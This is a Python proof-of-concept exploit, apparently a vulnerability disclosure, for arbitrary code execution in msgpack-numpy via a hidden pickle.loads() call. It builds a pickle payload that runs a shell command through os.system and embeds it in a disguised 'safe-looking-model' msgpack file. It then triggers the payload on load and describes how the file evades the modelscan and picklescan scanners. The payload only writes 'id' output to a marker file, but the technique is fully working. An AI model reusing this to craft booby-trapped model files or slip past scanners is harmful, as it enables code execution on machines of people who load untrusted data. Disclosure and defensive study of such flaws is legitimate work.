"""
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()

VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
data when the serialized array has dtype kind 'O' (object). This enables
arbitrary code execution whenever a msgpack file is deserialized with the
msgpack_numpy hooks.

The vulnerable code in msgpack_numpy.py decode():

    if b'kind' in obj and obj[b'kind'] == b'O':
        return pickle.loads(obj[b'data'])

An attacker can craft a .msgpack file where any array field has kind='O'
and data=<malicious_pickle_payload>, achieving RCE on deserialization.

This is particularly dangerous because:
  1. MessagePack is considered a "safe" serialization format
  2. Users expect msgpack files to contain only data, not executable code
  3. The pickle.loads() call is hidden inside the msgpack extension hooks
  4. No scanner (modelscan, picklescan) checks .msgpack files

Affected: msgpack-numpy <= 0.4.8 (all versions)
"""
|
|
| import msgpack |
| import msgpack_numpy as m |
| import pickle |
| import os |
| import sys |
| import numpy as np |
|
|
# File the proof-of-concept command writes to; the script later checks for it
# to decide whether the command actually ran.
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"


# --- Baseline ---------------------------------------------------------------
# Round-trip an ordinary float32 array through the msgpack_numpy hooks to show
# what legitimate usage looks like.
print("[*] Demonstrating normal msgpack_numpy usage...")
normal_data = {
    "weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
}
packed_normal = msgpack.packb(normal_data, default=m.encode)
unpacked_normal = msgpack.unpackb(
    packed_normal,
    object_hook=m.decode,
    raw=False,
)
print(f"[+] Normal round-trip: {unpacked_normal}")
|
|
| |
| |
| |
print("\n[*] Creating malicious msgpack payload...")


class MaliciousPayload:
    """Proof-of-concept object whose pickled form runs a shell command on load.

    The command only records the output of ``id`` plus a fixed banner line in
    ``MARKER_FILE``, so that execution can be verified afterwards.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle invokes on load."""
        banner = "RCE via msgpack_numpy hidden pickle.loads"
        cmd = f"id > {MARKER_FILE} && echo '{banner}' >> {MARKER_FILE}"
        return os.system, (cmd,)


# Serialized form of the payload; this is what gets embedded in the msgpack
# structure in place of real array data.
malicious_pickle = pickle.dumps(MaliciousPayload())
|
|
| |
| |
| |
# Hand-built record for the "weights" field. Per the vulnerable check quoted in
# the module docstring, kind == b'O' makes msgpack_numpy.decode() hand b'data'
# to pickle.loads().
# NOTE(review): b'nd', b'shape' and b'type' presumably make the dict resemble
# an ordinary serialized ndarray -- confirm against msgpack_numpy.decode().
# Key order is kept as-is because it determines the packed byte layout.
malicious_array = {
    b'nd': True,
    b'kind': b'O',
    b'data': malicious_pickle,
    b'shape': (1,),
    b'type': b'O',
}


# Wrap the record in an innocuous-looking "model" document.
model_data = dict(
    model_name="safe-looking-model",
    version="1.0.0",
    weights=malicious_array,
)
|
|
# Serialize with plain msgpack (no msgpack_numpy encoder is needed, since the
# record is already a dict of bytes keys) and store it on disk.
malicious_path = "/tmp/malicious_model.msgpack"
packed = msgpack.packb(model_data, use_bin_type=True)
with open(malicious_path, mode='wb') as f:
    f.write(packed)


file_size = len(packed)
print(f"[+] Malicious msgpack file saved to {malicious_path}")
print(f" File size: {file_size} bytes")
|
|
| |
| |
| |
# Start from a clean slate so a marker left over from an earlier run cannot be
# mistaken for proof of execution. Removing directly (EAFP) avoids the
# check-then-remove race of os.path.exists() followed by os.remove(); a missing
# file is the expected case and is ignored, any other OSError still propagates.
try:
    os.remove(MARKER_FILE)
except FileNotFoundError:
    pass
|
|
| |
| |
| |
# Deserialize the crafted file the way an application using msgpack_numpy
# would: with m.decode installed as the object hook.
# WARNING: this executes the embedded pickle payload -- run only in a
# disposable/isolated environment.
print("\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
with open(malicious_path, mode='rb') as f:
    loaded = msgpack.unpackb(
        f.read(),
        object_hook=m.decode,
        raw=False,
    )


if isinstance(loaded, dict):
    loaded_summary = list(loaded.keys())
else:
    loaded_summary = type(loaded)
print(f"[+] Loaded data keys: {loaded_summary}")
|
|
| |
| |
| |
# The marker exists only if the command embedded in the pickle ran during the
# load above; bail out with a non-zero status otherwise.
if not os.path.exists(MARKER_FILE):
    print("\n[-] RCE marker file not found")
    sys.exit(1)

with open(MARKER_FILE) as f:
    content = f.read().strip()
print("\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
print(f"[!!!] Marker file contents:\n{content}")
# Clean up the proof file once it has been reported.
os.remove(MARKER_FILE)
|
|
| |
| |
| |
# Informational section: static text only, nothing is scanned or executed here.
separator = "=" * 60
print("\n" + separator)
print("SCANNER EVASION")
print(separator)
print("""
Neither modelscan nor picklescan scan .msgpack files at all.

modelscan -p /tmp/malicious_model.msgpack
# -> Skips file (unsupported format)

picklescan -p /tmp/malicious_model.msgpack
# -> Scanned files: 0, Infected files: 0

The pickle payload is embedded inside a msgpack structure,
completely invisible to all current model security scanners.
""")
|
|
# Final report. The installed library version is shown when the module exposes
# __version__; otherwise the literal '0.4.8' is printed instead.
summary_rule = "=" * 60
library_version = getattr(m, '__version__', '0.4.8')
print(summary_rule)
print("VULNERABILITY SUMMARY")
print(summary_rule)
print(f"""
Library: msgpack-numpy {library_version}
File: msgpack_numpy.py, decode() function
Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
Attack: Set array kind='O' and data=<malicious_pickle_bytes>
Impact: Arbitrary code execution on file load
Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
picklescan - NOT APPLICABLE (.msgpack not scanned)

Real-world usage: msgpack-numpy is used for ML data serialization,
feature embeddings, and intermediate model storage. Any application
loading untrusted .msgpack files with msgpack_numpy is vulnerable.
""")
|
|